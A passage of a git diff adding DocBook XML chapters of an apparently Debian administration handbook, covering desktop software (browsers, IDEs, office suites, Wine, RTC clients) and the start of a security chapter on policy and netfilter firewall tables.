+	Firefox and Thunderbird were missing. The <emphasis role="pkg">iceweasel</emphasis> package contained Iceweasel,
+	which was basically Firefox under another name.</para>
+
+      <para>The rationale behind this renaming was a result of the usage
+      rules imposed by the Mozilla Foundation on the
+      <trademark>Firefox</trademark> registered trademark: any software
+      named Firefox had to use the official Firefox logo and icons.
+      However, since these elements are not released under a free
+      license, Debian could not distribute them in its
+      <emphasis>main</emphasis> section. Rather than moving the whole
+      browser to <emphasis>non-free</emphasis>, the package maintainer
+      choose to use a different name.</para>
+
+      <para>For similar reasons, the <trademark>Thunderbird</trademark>
+      email client was renamed to Icedove in a similar fashion.</para>
+
+      <para>
+        Nowadays, the logo and icons are distributed under a free software
+        license and Mozilla recognized that the changes made by the Debian
+        project are respecting their trademark license so Debian is again able
+        to ship Mozilla's applications under their official name.
+      </para>
+    </sidebar>
+    <indexterm><primary>Mozilla</primary><secondary>Firefox</secondary></indexterm>
+    <indexterm><primary>Firefox, Mozilla</primary></indexterm>
+
+    <sidebar>
+      <title><emphasis>CULTURE</emphasis> Mozilla</title>
+
+      <para>Netscape Navigator was the standard browser when the web started
+      reaching the masses, but lost ground when Microsoft bundled Internet
+      Explorer with Windows and signed contracts with computer manufacturers
+      which forbade them from pre-installing Netscape Navigator. Faced with
+      this failure, Netscape (the company) decided to “free” its source
+      code, by releasing it under a free license, to give it a second
+      life. This was the beginning of the Mozilla project. After many
+      years of development, the results are more than satisfying: the
+      Mozilla project brought forth an HTML rendering engine (called
+      Gecko) that is among the most standard-compliant. This rendering
+      engine is in particular used by the Mozilla Firefox browser, which
+      is one of the most successful browsers, with a fast-growing user
+      base.</para>
+      <indexterm><primary>Mozilla</primary></indexterm>
+      <indexterm><primary>Netscape</primary></indexterm>
+    </sidebar>
+
+    <para>Last but not least, Debian also contains the
+    <emphasis>Chromium</emphasis> web browser (available in
+    the <emphasis role="pkg">chromium</emphasis> package). This
+    browser is developed by Google at such a fast pace that maintaining a
+    single version of it across the whole lifespan of Debian <emphasis role="distribution">Stretch</emphasis> is unlikely to be possible.
+    Its clear purpose is to make web services more attractive, both by
+    optimizing the browser for performance and by increasing the user's
+    security. The free code that powers Chromium is also used by its
+    proprietary version called Google Chrome.</para>
+  </section>
+  <section id="sect.development">
+    <title>Development</title>
+    <section>
+      <title>Tools for GTK+ on GNOME</title>
+
+      <para>Anjuta (in the <emphasis role="pkg">anjuta</emphasis>
+      package) and GNOME Builder (in the <emphasis role="pkg">gnome-builder</emphasis> package) are
+      Integrated Development Environments (<acronym>IDE</acronym>)
+      optimized for creating GTK+ applications for GNOME.
+      Glade (in the <emphasis role="pkg">glade</emphasis> package) is
+      an application designed to create GTK+ graphical interfaces for
+      GNOME and save them in an XML file. These XML files can then be
+      loaded by the GTK+ shared library though its
+      <literal>GtkBuilder</literal> component to recreate the saved
+      interfaces; such a feature can be interesting, for instance for
+      plugins that require dialogs.
+      <ulink type="block" url="https://wiki.gnome.org/Apps/Builder" />
+      <ulink type="block" url="http://anjuta.org/" />
+      <ulink type="block" url="https://glade.gnome.org/" />
+      </para>
+      <indexterm><primary>Anjuta</primary></indexterm>
+      <indexterm><primary>Builder, GNOME Builder</primary></indexterm>
+      <indexterm><primary>Glade</primary></indexterm>
+    </section>
+    <section>
+      <title>Tools for Qt</title>
+
+      <para>The equivalent applications for Qt applications are KDevelop by KDE (in the
+      <emphasis role="pkg">kdevelop</emphasis> package) for the
+      development environment, and Qt Designer (in the <emphasis role="pkg">qttools5-dev-tools</emphasis> package) for the design of
+      graphical interfaces for Qt applications.</para>
+
+      <para>KDevelop is also a generic IDE and provides plugins for other
+      languages like Python and PHP and different build systems.</para>
+
+      <indexterm><primary>KDevelop</primary></indexterm>
+      <indexterm><primary>Qt</primary><secondary>Designer</secondary></indexterm>
+    </section>
+  </section>
+  <section id="sect.collaborative-work">
+    <title>Collaborative Work</title>
+    <indexterm><primary>Collaborative Work</primary></indexterm>
+    <section>
+      <title>Working in Groups: <foreignphrase>groupware</foreignphrase></title>
+      <indexterm><primary><emphasis>groupware</emphasis></primary></indexterm>
+
+      <para>Groupware tools tend to be relatively complex
+      to maintain because they aggregate multiple tools and
+      have requirements that are not always easy to reconcile in
+      the context of an integrated distribution. Thus there
+      is a long list of groupware packages that were once available
+      in Debian but have been dropped for lack of maintainers
+      or incompatibility with other (newer) software in Debian.
+      This has been the case with PHPGroupware, eGroupware, and
+      Kolab.
+      <ulink type="block" url="http://www.egroupware.org/" />
+      <ulink type="block" url="https://www.kolab.org/" />
+      </para>
+      <indexterm><primary>eGroupware</primary></indexterm>
+      <indexterm><primary>Kolab</primary></indexterm>
+
+      <para>All is not lost though. Many of the features
+      traditionally provided by “groupware” software are
+      increasingly integrated into “standard” software. This is
+      reducing the requirement for specific, specialized groupware
+      software. On the other hand, this usually requires a specific
+      server. Citadel (in the <emphasis role="pkg">citadel-suite</emphasis> package) and Sogo (in the
+      <emphasis role="pkg">sogo</emphasis> package) are alternatives
+      that are available in Debian <emphasis role="distribution">Stretch</emphasis>.</para>
+
+    </section>
+    <section>
+      <title>Collaborative Work With FusionForge</title>
+      <indexterm><primary>FusionForge</primary></indexterm>
+
+      <para>FusionForge is a collaborative development tool with some
+      ancestry in SourceForge, a hosting service for free software
+      projects. It takes the same overall approach based on the standard
+      development model for free software. The software itself has kept
+      evolving after the SourceForge code went proprietary. Its initial
+      authors, VA Software, decided not to release any more free
+      versions. The same happened again when the first fork (GForge)
+      followed the same path. Since various people and organizations have
+      participated in development, the current FusionForge also includes
+      features targeting a more traditional approach to development, as
+      well as projects not purely concerned with software
+      development.</para>
+      <indexterm><primary>SourceForge</primary></indexterm>
+
+      <para>FusionForge can be seen as an amalgamation of several tools
+      dedicated to manage, track and coordinate projects. These tools can
+      be roughly classified into three families:</para>
+      <itemizedlist>
+	<listitem>
+	  <para><emphasis>communication</emphasis>: web forums,
+	  mailing-list manager, and announcement system allowing a project to
+	  publish news</para>
+	</listitem>
+	<listitem>
+	  <para><emphasis>tracking</emphasis>: tools to track project progress
+	  and schedule tasks, to track bugs, feature requests, or any other
+	  kind of “ticket”, and to run surveys</para>
+	</listitem>
+	<listitem>
+	  <para><emphasis>sharing</emphasis>: documentation manager to
+	  provide a single central point for documents related to a
+	  project, generic file release manager, dedicated website for
+	  each project.</para>
+	</listitem>
+      </itemizedlist>
+
+      <para>Since FusionForge largely targets development projects,
+      it also integrates many tools such as CVS, Subversion, Git, Bazaar,
+      Darcs, Mercurial and Arch for source control management (also called
+      “configuration management” or “version control”). These programs keep a
+      history of all the
+      revisions of all tracked files (often source code files), with all
+      the changes they go through, and they can merge modifications when
+      several developers work simultaneously on the same part of a
+      project.</para>
+
+      <para>Most of these tools can be accessed or even managed through
+      a web interface, with a fine-grained permission system, and email
+      notifications for some events.</para>
+
+      <para>
+        Unfortunately, FusionForge is not part of Debian <emphasis role="distribution">Stretch</emphasis>. It is a large software
+        stack that is hard to maintain properly and benefits only few
+        users who are usually expert enough to be able to backport the
+        package from Debian <emphasis role="distribution">Unstable</emphasis>.
+      </para>
+
+    </section>
+  </section>
+  <section id="sect.office-suites">
+    <title>Office Suites</title>
+    <indexterm><primary>office suite</primary></indexterm>
+    <indexterm><primary>suite, office</primary></indexterm>
+
+    <para>Office software has long been seen as lacking in the free
+    software world. Users require replacements for
+    Microsoft tools such as Word and Excel, but these are so complex
+    that replacements were hard to develop. The situation changed
+    when Sun released the StarOffice code under a free license as OpenOffice, a
+    project which later gave birth to Libre Office, which is available on
+    Debian.
+    The KDE project also has its own office suite, called Calligra Suite
+    (previously KOffice), and GNOME, while never offering a comprehensive
+    office suite, provides AbiWord as a word processor and Gnumeric as a
+    spreadsheet. The various projects each have their strengths. For instance,
+    the Gnumeric spreadsheet is better than OpenOffice.org/Libre Office in some
+    domains, notably the precision of its calculations. On the word processing
+    front, the Libre Office suite still leads the way.</para>
+    <indexterm><primary>OpenOffice.org</primary></indexterm>
+    <indexterm><primary>StarOffice</primary></indexterm>
+    <indexterm><primary>Libre Office</primary></indexterm>
+    <indexterm><primary>GNOME Office</primary></indexterm>
+    <indexterm><primary>Calligra Suite</primary></indexterm>
+    <indexterm><primary>Gnumeric</primary></indexterm>
+
+    <para>Another important feature for users is the ability to
+    import Microsoft Office documents. Even though all
+    office suites have this feature, only the ones in
+    OpenOffice.org and Libre Office are functional enough for daily
+    use.</para>
+
+    <sidebar>
+      <title><emphasis>THE BROADER VIEW</emphasis> Libre Office replaces OpenOffice.org</title>
+
+      <para>OpenOffice.org contributors set up a foundation
+      (<emphasis>The Document Foundation</emphasis>) to foster the project's
+      development. The idea had been discussed for some time, but the
+      actual trigger was Oracle's acquisition of Sun. The new ownership
+      made the future of OpenOffice under Oracle uncertain. Since Oracle
+      declined to join the foundation, the developers had to give up on
+      the OpenOffice.org name. This office suite is now known as
+      <emphasis>Libre Office</emphasis>, and is available in Debian.</para>
+
+      <para>After a period of relative stagnation on OpenOffice.org, Oracle
+      donated the code and associated rights to the Apache Software Foundation,
+      and OpenOffice is now an Apache project. This project is not currently
+      available in Debian and is rather moribund when compared to Libre Office.</para>
+
+    </sidebar>
+    <indexterm><primary>Word, Microsoft</primary></indexterm>
+    <indexterm><primary>Excel, Microsoft</primary></indexterm>
+    <indexterm><primary>Microsoft</primary><secondary>Word</secondary></indexterm>
+    <indexterm><primary>Microsoft</primary><secondary>Excel</secondary></indexterm>
+
+    <para>Libre Office and Calligra Suite are available in the <emphasis role="pkg">libreoffice</emphasis> and <emphasis role="pkg">calligra</emphasis> Debian packages, respectively.
+    Although the <emphasis role="pkg">gnome-office</emphasis> package was
+    previously used to install a collection of office tools such as AbiWord and
+    Gnumeric, this package is no longer part of Debian, with the individual
+    packages now standing on their own.</para>
+    <para>Language-specific packs for Libre Office are
+    distributed in separate packages, most notably <emphasis role="pkg">libreoffice-l10n-*</emphasis> and <emphasis role="pkg">libreoffice-help-*</emphasis>. Some
+    features such as spelling dictionaries, hyphenation patterns and
+    thesauri are in separate packages, such as <emphasis role="pkg">myspell-*</emphasis>, <emphasis role="pkg">hunspell-*</emphasis>, <emphasis role="pkg">hyphen-*</emphasis> and <emphasis role="pkg">mythes-*</emphasis>.</para>
+  </section>
+  <section id="sect.windows-emulation">
+    <title>Emulating Windows: Wine</title>
+    <indexterm><primary>Emulating Windows</primary></indexterm>
+    <indexterm><primary>Windows, emulation</primary></indexterm>
+
+    <para>In spite of all the previously mentioned efforts, there are still
+    a number of tools without a Linux equivalent, or for which the original
+    version is absolutely required. This is where Windows emulation systems
+    come in handy. The most well-known among them is Wine.
+    <ulink type="block" url="https://www.winehq.org/" /></para>
+
+    <sidebar>
+      <title><emphasis>COMPLEMENTS</emphasis> CrossOver Linux</title>
+
+      <para><emphasis>CrossOver</emphasis>, produced by CodeWeavers, is a
+      set of enhancements to Wine that broadens the available set of
+      emulated features to a point at which Microsoft Office becomes fully
+      usable. Some of the enhancements are periodically merged into Wine.
+      <ulink type="block" url="https://www.codeweavers.com/products/" /></para>
+      <indexterm><primary><emphasis>CrossOver</emphasis></primary></indexterm>
+      <indexterm><primary>CodeWeavers</primary></indexterm>
+    </sidebar>
+
+    <para>However, one should keep in mind that it is only a solution among
+    others, and the problem can also be tackled with a virtual machine or
+    VNC; both of these solutions are detailed in the sidebars
+    <xref linkend="sidebar.virtual-machines" /> and
+    <xref linkend="sidebar.wts-or-vnc" />.</para>
+
+    <para>Let us start with a reminder: emulation allows executing a
+    program (developed for a target system) on a different host system. The
+    emulation software uses the host system, where the application runs, to
+    imitate the required features of the target system.</para>
+    <indexterm><primary>Wine</primary></indexterm>
+
+    <para>Now let's install the required packages (<emphasis role="pkg">ttf-mscorefonts-installer</emphasis> is in the contrib section):</para>
+
+    <screen>
+<computeroutput># </computeroutput><userinput>apt install wine ttf-mscorefonts-installer</userinput>
+</screen>
+    <indexterm><primary><command>winecfg</command></primary></indexterm>
+
+    <para>On a 64 bit (amd64) system, if your Windows applications
+    are 32 bit applications, then you will have to enable multi-arch
+    to be able to install wine32 from the i386 architecture (see <xref linkend="sect.multi-arch" />).</para>
+
+    <para>The user then needs to run <command>winecfg</command> and
+    configure which (Debian) locations are mapped to which (Windows)
+    drives. <command>winecfg</command> has some sane defaults and can
+    autodetect some more drives; note that even if you have a
+    dual-boot system, you should not point the <literal>C:</literal>
+    drive at where the Windows partition is mounted in Debian, as Wine is
+    likely to overwrite some of the data on that partition, making
+    Windows unusable.  Other settings can be kept to their default
+    values.  To run Windows programs, you will first need to install
+    them by running their (Windows) installer under Wine, with a
+    command such as <command>wine
+    <replaceable>.../setup.exe</replaceable></command>; once the
+    program is installed, you can run it with <command>wine
+    <replaceable>.../program.exe</replaceable></command>.  The exact
+    location of the <filename>program.exe</filename> file depends on
+    where the <literal>C:</literal> drive is mapped; in many cases,
+    however, simply running <command>wine
+    <replaceable>program</replaceable></command> will work, since the
+    program is usually installed in a location where Wine will look
+    for it by itself.</para>
+
+    <sidebar>
+      <title><emphasis>TIP</emphasis> Working around a winecfg failure</title>
+      <para>In some cases, <command>winecfg</command> (which is just a
+        wrapper) might fail. As a work-around, it is possible to try to
+        run the underlying command manually: <command>wine64
+          /usr/lib/x86_64-linux-gnu/wine/wine/winecfg.exe.so</command> or
+        <command>wine32
+          /usr/lib/i386-linux-gnu/wine/wine/winecfg.exe.so</command>.
+      </para>
+    </sidebar>
+
+    <para>Note that you should not rely on Wine (or similar solutions)
+    without actually testing the particular software: only a real-use test
+    will determine conclusively whether emulation is fully
+    functional.</para>
+
+    <sidebar id="sidebar.virtual-machines">
+      <title><emphasis>ALTERNATIVE</emphasis> Virtual machines</title>
+
+      <para>An alternative to emulating Microsoft's operating system is to
+      actually run it in a virtual machine that emulates a full hardware
+      machine. This allows running any operating system. <xref linkend="advanced-administration" /> describes several virtualization
+      systems, most notably Xen and KVM (but also QEMU, VMWare and
+      Bochs).</para>
+    </sidebar>
+
+    <sidebar id="sidebar.wts-or-vnc">
+      <title><emphasis>ALTERNATIVE</emphasis> <foreignphrase>Windows Terminal Server</foreignphrase> or VNC</title>
+
+      <para>Yet another possibility is to remotely run the legacy Windows
+      applications on a central server with <emphasis>Windows Terminal
+      Server</emphasis> and access the application from Linux machines
+      using <emphasis>rdesktop</emphasis>. This is a Linux client for the
+      RDP protocol (<emphasis>Remote Desktop Protocol</emphasis>) that
+      <foreignphrase>Windows NT/2000 Terminal Server</foreignphrase> uses
+      to display desktops on remote machines.</para>
+      <indexterm><primary>RDP</primary></indexterm>
+      <indexterm><primary><emphasis>Remote Desktop Protocol</emphasis></primary></indexterm>
+      <indexterm><primary><emphasis>Windows Terminal Server</emphasis></primary></indexterm>
+
+      <para>The VNC software provides similar features, with the added
+      benefit of also working with many operating systems. Linux VNC
+      clients and servers are described in <xref linkend="sect.remote-login" />.</para>
+    </sidebar>
+  </section>
+  <section id="sect.rtc-clients">
+    <title>Real-Time Communications software</title>
+
+    <para>Debian provides a wide range of Real-Time Communications (RTC)
+    client software. The setup of RTC servers is discussed in
+    <xref linkend="sect.rtc-services" />. In SIP terminology,
+    a client application or device is also referred to as a user agent.</para>
+    <indexterm><primary>User agent (SIP)</primary></indexterm>
+    <indexterm><primary>SIP</primary><secondary>user agent</secondary></indexterm>
+
+    <para>Each client application varies in functionality. Some
+    applications are more convenient for intensive chat users while
+    other applications are more stable for webcam users. It may be
+    necessary to test several applications to identify those which
+    are most satisfactory. A user may finally decide that they
+    need more than one application, for example, an XMPP application
+    for messaging with customers and an IRC application for collaboration
+    with some online communities.</para>
+
+    <para>To maximize the ability of users to communicate with the wider
+    world, it is recommended to configure both SIP and XMPP clients
+    or a single client that supports both protocols.</para>
+    <indexterm><primary>SIP</primary></indexterm>
+    <indexterm><primary>XMPP</primary></indexterm>
+
+    <para>The default GNOME desktop suggests the Empathy communications
+    client. Empathy can support both SIP and XMPP. It supports instant
+    messaging (IM), voice and video. The KDE project provides KDE Telepathy,
+    a communications client based on the same underlying Telepathy APIs
+    used by the GNOME Empathy client.</para>
+    <indexterm><primary>Empathy</primary></indexterm>
+    <indexterm><primary>Telepathy</primary></indexterm>
+
+    <para>Popular alternatives to Empathy/Telepathy include Ekiga,
+    Linphone, Psi and Ring (formerly known as SFLphone).</para>
+    <indexterm><primary>Ekiga</primary></indexterm>
+    <indexterm><primary>Linphone</primary></indexterm>
+    <indexterm><primary>Psi</primary></indexterm>
+    <indexterm><primary>Ring (soft-phone)</primary></indexterm>
+    <indexterm><primary>SFLphone</primary></indexterm>
+
+    <para>Some of these applications can also interact with mobile users
+    using apps such as Lumicall on Android.
+    <ulink type="block" url="https://lumicall.org" />
+    </para>
+    <indexterm><primary>Lumicall</primary></indexterm>
+
+    <para>The <emphasis>Real-Time Communications Quick Start
+    Guide</emphasis> has a chapter dedicated to client software.
+    <ulink type="block" url="http://rtcquickstart.org/guide/multi/useragents.html" /></para>
+
+    <sidebar>
+     <title><emphasis>TIP</emphasis> Look for clients supporting
+     ICE and TURN</title>
+
+     <para>Some RTC clients have significant problems sending voice and
+     video through firewalls and NAT networks. Users may receive
+     ghost calls (their phone rings but they don't hear the other person)
+     or they may not be able to call at all.</para>
+
+     <para>The ICE and TURN protocols were developed to resolve these issues.
+     Operating a TURN server with public IP addresses in each site and
+     using client software that supports both ICE and TURN gives the
+     best user experience.</para>
+
+     <para>If the client software is only intended for instant messaging,
+     there is no requirement for ICE or TURN support.</para>
+    </sidebar>
+
+    <para>Debian Developers operate a community SIP service at
+    <ulink url="https://rtc.debian.org">rtc.debian.org</ulink>.
+    The community maintains a wiki with documentation about setting
+    up many of the client applications packaged in Debian.  The wiki articles
+    and screenshots are a useful resource for anybody setting up a similar
+    service on their own domain.
+    <ulink type="block" url="https://wiki.debian.org/UnifiedCommunications/DebianDevelopers/UserGuide" />
+    </para>
+
+    <sidebar>
+     <title><emphasis>ALTERNATIVE</emphasis> Internet Relay Chat</title>
+
+     <para>IRC can also be considered, in addition to SIP and XMPP. IRC
+     is more oriented around the concept of channels, the name of
+     which starts with a hash sign <literal>#</literal>. Each channel
+     is usually targeted at a specific topic and any number of people
+     can join a channel to discuss it (but users can still have
+     one-to-one private conversations if needed). The IRC protocol is
+     older, and does not allow end-to-end encryption of the messages;
+     it is still possible to encrypt the communications between the
+     users and the server by tunneling the IRC protocol inside
+     SSL.</para>
+     <indexterm><primary>IRC</primary></indexterm>
+     <indexterm><primary><foreignphrase>Internet Relay Chat</foreignphrase></primary></indexterm>
+
+     <para>IRC clients are a bit more complex, and they usually
+     provide many features that are of limited use in a corporate
+     environment. For instance, channel “operators” are users
+     endowed with the ability to kick other users from a channel, or
+     even ban them permanently, when the normal discussion is
+     disrupted.</para>
+
+     <para>Since the IRC protocol is very old, many clients are available
+       to cater for many user groups; examples include XChat (only
+       available in <emphasis role="distribution">stretch-backports</emphasis>,
+       not in <emphasis role="distribution">stretch</emphasis>), and Smuxi
+       (graphical clients based on GTK+), Irssi (text mode), Circe
+       (integrated to Emacs), and so on.</para>
+    </sidebar>
+
+    <sidebar>
+     <title><emphasis>QUICK LOOK</emphasis> Video conferencing with Ekiga</title>
+
+     <para>Ekiga (formerly GnomeMeeting) is a prominent
+     application for Linux video conferencing. It is both stable and
+     functional, and is very easily used on a local network; setting
+     up the service on a global network is much more complex when the
+     firewalls involved lack explicit support for the H323 and/or SIP
+     teleconferencing protocols with all their quirks.</para>
+     <indexterm><primary>video conference</primary></indexterm>
+     <indexterm><primary>H323</primary></indexterm>
+
+     <para>If only one Ekiga client is to run behind the firewall, the
+     configuration is rather straightforward, and only involves
+     forwarding a few ports to the dedicated host: TCP port 1720
+     (listening for incoming connections), TCP port 5060 (for SIP),
+     TCP ports 30000 to 30010 (for control of open connections) and
+     UDP ports 5000 to 5100 (for audio and video data transmission and
+     registration to an H323 proxy).</para>
+     <indexterm><primary>GnomeMeeting</primary></indexterm>
+     <indexterm><primary>Ekiga</primary></indexterm>
+
+     <para>When several Ekiga clients are to run behind the firewall,
+     complexity increases notably. An H323 proxy (for instance the
+     <emphasis role="pkg">gnugk</emphasis> package) must be set up,
+     and its configuration is far from simple.</para>
+     <indexterm><primary><emphasis role="pkg">gnugk</emphasis></primary></indexterm>
+    </sidebar>
+  </section>
+</chapter>
diff --git a/tmp/cs-CZ/xml_tmp/14_security.xml b/tmp/cs-CZ/xml_tmp/14_security.xml
new file mode 100644
index 000000000..674fb5fc7
--- /dev/null
+++ b/tmp/cs-CZ/xml_tmp/14_security.xml
@@ -0,0 +1,2888 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="security">
+  <chapterinfo>
+    <mediaobject condition="pdf">
+      <imageobject>
+        <imagedata fileref="images/chap-security.png" scalefit="1" />
+      </imageobject>
+    </mediaobject>
+    <keywordset>
+      <keyword>Firewall</keyword>
+      <keyword>Netfilter</keyword>
+      <keyword>IDS/NIDS</keyword>
+    </keywordset>
+  </chapterinfo>
+  <title>Security</title>
+  <highlights>
+    <para>An information system can have a varying level of importance
+    depending on the environment. In some cases, it is vital to a company's
+    survival. It must therefore be protected from various kinds of risks.
+    The process of evaluating these risks, defining and implementing the
+    protection is collectively known as the “security process”.</para>
+  </highlights>
+  <section id="sect.defining-security-policy">
+    <title>Defining a Security Policy</title>
+
+    <sidebar>
+      <title><emphasis>CAUTION</emphasis> Scope of this chapter</title>
+
+      <para>Security is a vast and very sensitive subject, so we cannot
+      claim to describe it in any kind of comprehensive manner in the
+      course of a single chapter. We will only delineate a few important
+      points and describe some of the tools and methods that can be of use
+      in the security domain. For further reading, literature abounds, and
+      entire books have been devoted to the subject. An excellent starting
+      point would be <citetitle>Linux Server Security</citetitle> by
+      Michael D. Bauer (published by O'Reilly).</para>
+    </sidebar>
+
+    <para>The word “security” itself covers a vast range of concepts,
+    tools and procedures, none of which apply universally. Choosing among
+    them requires a precise idea of what your goals are. Securing a system
+    starts with answering a few questions. Rushing headlong into
+    implementing an arbitrary set of tools runs the risk of focusing on the
+    wrong aspects of security.</para>
+
+    <para>The very first thing to determine is therefore the goal. A good
+    approach to help with that determination starts with the following
+    questions:</para>
+    <itemizedlist>
+      <listitem>
+	<para><emphasis>What</emphasis> are we trying to protect? The
+	security policy will be different depending on whether we want to
+	protect computers or data. In the latter case, we also need to know
+	which data.</para>
+      </listitem>
+      <listitem>
+	<para>What are we trying to protect <emphasis>against</emphasis>?
+	Is it leakage of confidential data? Accidental data loss? Revenue
+	loss caused by disruption of service?</para>
+      </listitem>
+      <listitem>
+	<para>Also, <emphasis>who</emphasis> are we trying to protect
+	against? Security measures will be quite different for guarding
+	against a typo by a regular user of the system than they would be
+	when protecting against a determined attacker group.</para>
+      </listitem>
+    </itemizedlist>
+
+    <para>The term “risk” is customarily used to refer collectively to
+    these three factors: what to protect, what needs to be prevented from
+    happening, and who will try to make it happen. Modeling the risk
+    requires answers to these three questions. From this risk model, a
+    security policy can be constructed, and the policy can be implemented
+    with concrete actions.</para>
+
+    <sidebar>
+      <title><emphasis>NOTE</emphasis> Permanent questioning</title>
+
+      <para>Bruce Schneier, a world expert in security matters (not only
+      computer security) tries to counter one of security's most important
+      myths with a motto: “Security is a process, not a product”.
+      Assets to be protected change in time, and so do threats and the
+      means available to potential attackers. Even if a security policy has
+      initially been perfectly designed and implemented, one should never
+      rest on one's laurels. The risk components evolve, and the response
+      to that risk must evolve accordingly.</para>
+    </sidebar>
+
+    <para>Extra constraints are also worth taking into account, as they can
+    restrict the range of available policies. How far are we willing to
+    go to secure a system? This question has a major impact on the policy
+    to implement. The answer is too often only defined in terms of monetary
+    costs, but the other elements should also be considered, such as the
+    amount of inconvenience imposed on system users or performance
+    degradation.</para>
+
+    <para>Once the risk has been modeled, one can start thinking about
+    designing an actual security policy.</para>
+
+    <sidebar>
+      <title><emphasis>NOTE</emphasis> Extreme policies</title>
+
+      <para>There are cases where the choice of actions required to secure
+      a system is extremely simple.</para>
+
+      <para>For instance, if the system to be protected only comprises a
+      second-hand computer, the sole use of which is to add a few numbers
+      at the end of the day, deciding not to do anything special to protect
+      it would be quite reasonable. The intrinsic value of the system is
+      low. The value of the data is zero since they are not stored on the
+      computer. A potential attacker infiltrating this “system” would
+      only gain an unwieldy calculator. The cost of securing such a system
+      would probably be greater than the cost of a breach.</para>
+
+      <para>At the other end of the spectrum, we might want to protect the
+      confidentiality of secret data in the most comprehensive way
+      possible, trumping any other consideration. In this case, an
+      appropriate response would be the total destruction of these data
+      (securely erasing the files, shredding of the hard disks to bits,
+      then dissolving these bits in acid, and so on). If there is an
+      additional requirement that data must be kept in store for future use
+      (although not necessarily readily available), and if cost still isn't
+      a factor, then a starting point would be storing the data on
+      iridium–platinum alloy plates stored in bomb-proof bunkers under
+      various mountains in the world, each of which being (of course) both
+      entirely secret and guarded by entire armies…</para>
+
+      <para>Extreme though these examples may seem, they would nevertheless
+      be an adequate response to defined risks, insofar as they are the
+      outcome of a thought process that takes into account the goals to
+      reach and the constraints to fulfill. When coming from a reasoned
+      decision, no security policy is less respectable than any
+      other.</para>
+    </sidebar>
+
+    <para>In most cases, the information system can be segmented in
+    consistent and mostly independent subsets. Each subsystem will have its
+    own requirements and constraints, and so the risk assessment and the
+    design of the security policy should be undertaken separately for each.
+    A good principle to keep in mind is that a short and well-defined
+    perimeter is easier to defend than a long and winding frontier. The
+    network organization should also be designed accordingly: the sensitive
+    services should be concentrated on a small number of machines, and
+    these machines should only be accessible via a minimal number of
+    check-points; securing these check-points will be easier than securing
+    all the sensitive machines against the entirety of the outside world.
+    It is at this point that the usefulness of network filtering (including
+    by firewalls) becomes apparent. This filtering can be implemented with
+    dedicated hardware, but a possibly simpler and more flexible solution
+    is to use a software firewall such as the one integrated in the Linux
+    kernel.</para>
+  </section>
+  <section id="sect.firewall-packet-filtering">
+    <title>Firewall or Packet Filtering</title>
+    <indexterm><primary>firewall</primary></indexterm>
+    <indexterm><primary>packet filter</primary></indexterm>
+
+    <sidebar>
+      <title><emphasis>BACK TO BASICS</emphasis> Firewall</title>
+      <indexterm><primary>packet</primary><secondary>IP</secondary></indexterm>
+
+      <para>A <emphasis>firewall</emphasis> is a piece of computer
+      equipment with hardware and/or software that sorts the incoming or
+      outgoing network packets (coming to or from a local network) and only
+      lets through those matching certain predefined conditions.</para>
+    </sidebar>
+
+    <para>A firewall is a filtering network gateway and is only effective
+    on packets that must go through it. Therefore, it can only be effective
+    when going through the firewall is the only route for these
+    packets.</para>
+
+    <para>The lack of a standard configuration (and the “process, not
+    product” motto) explains the lack of a turn-key solution. There are,
+    however, tools that make it simpler to configure the
+    <emphasis>netfilter</emphasis> firewall, with a graphical
+    representation of the filtering rules. <command>fwbuilder</command> is
+    undoubtedly among the best of them.</para>
+    <indexterm><primary><emphasis>netfilter</emphasis></primary></indexterm>
+
+    <sidebar>
+      <title><emphasis>SPECIFIC CASE</emphasis> Local Firewall</title>
+
+      <para>A firewall can be restricted to one particular machine (as
+      opposed to a complete network), in which case its role is to filter
+      or limit access to some services, or possibly to prevent outgoing
+      connections by rogue software that a user could, willingly or not,
+      have installed.</para>
+    </sidebar>
+
+    <para>The Linux kernel embeds the <emphasis>netfilter</emphasis>
+    firewall. It can be controlled from user space with the
+    <command>iptables</command> and <command>ip6tables</command> commands.
+    The difference between these two commands is that the former acts on
+    the IPv4 network, whereas the latter acts on IPv6. Since both network
+    protocol stacks will probably be around for many years, both tools
+    will need to be used in parallel.</para>
+    <indexterm><primary><command>iptables</command></primary></indexterm>
+    <indexterm><primary><command>ip6tables</command></primary></indexterm>
+    <section id="sect.netfilter">
+      <title>Netfilter Behavior</title>
+
+      <para><emphasis>netfilter</emphasis> uses four distinct tables which
+      store rules regulating three kinds of operations on packets:</para>
+      <itemizedlist>
+        <listitem>
+	  <para><literal>filter</literal> concerns filtering rules
+	  (accepting, refusing or ignoring a packet);</para>
+        </listitem>
+        <listitem>
+	  <para><literal>nat</literal> concerns translation of source or
+	  destination addresses and ports of packages;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>mangle</literal> concerns other changes to the IP
+	  packets (including the ToS — <emphasis>Type of
+	  Service</emphasis> — field and options);</para>
+        </listitem>
+        <listitem>
+	  <para><literal>raw</literal> allows other manual modifications on
+	  packets before they reach the connection tracking system.</para>
+        </listitem>
+      </itemizedlist>
+
+      <para>Each table contains lists of rules called
+      <emphasis>chains</emphasis>. The firewall uses standard chains to
+      handle packets based on predefined circumstances. The administrator
+      can create other chains, which will only be used when referred to by
+      one of the standard chains (either directly or indirectly).</para>
+      <indexterm><primary>chain</primary></indexterm>
+      <indexterm><primary>filtering rule</primary></indexterm>
+
+      <para>The <literal>filter</literal> table has three standard
+      chains:</para>
+      <itemizedlist>
+        <listitem>
+	  <para><literal>INPUT</literal>: concerns packets whose
+	  destination is the firewall itself;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>OUTPUT</literal>: concerns packets emitted by the
+	  firewall;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>FORWARD</literal>: concerns packets transiting
+	  through the firewall (which is neither their source nor their
+	  destination).</para>
+        </listitem>
+      </itemizedlist>
+
+      <para>The <literal>nat</literal> table also has three standard
+      chains:</para>
+      <itemizedlist>
+        <listitem>
+	  <para><literal>PREROUTING</literal>: to modify packets as soon as
+	  they arrive;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>POSTROUTING</literal>: to modify packets when they
+	  are ready to go on their way;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>OUTPUT</literal>: to modify packets generated by
+	  the firewall itself.</para>
+        </listitem>
+      </itemizedlist>
+
+      <figure id="figure.chaines-netfilter">
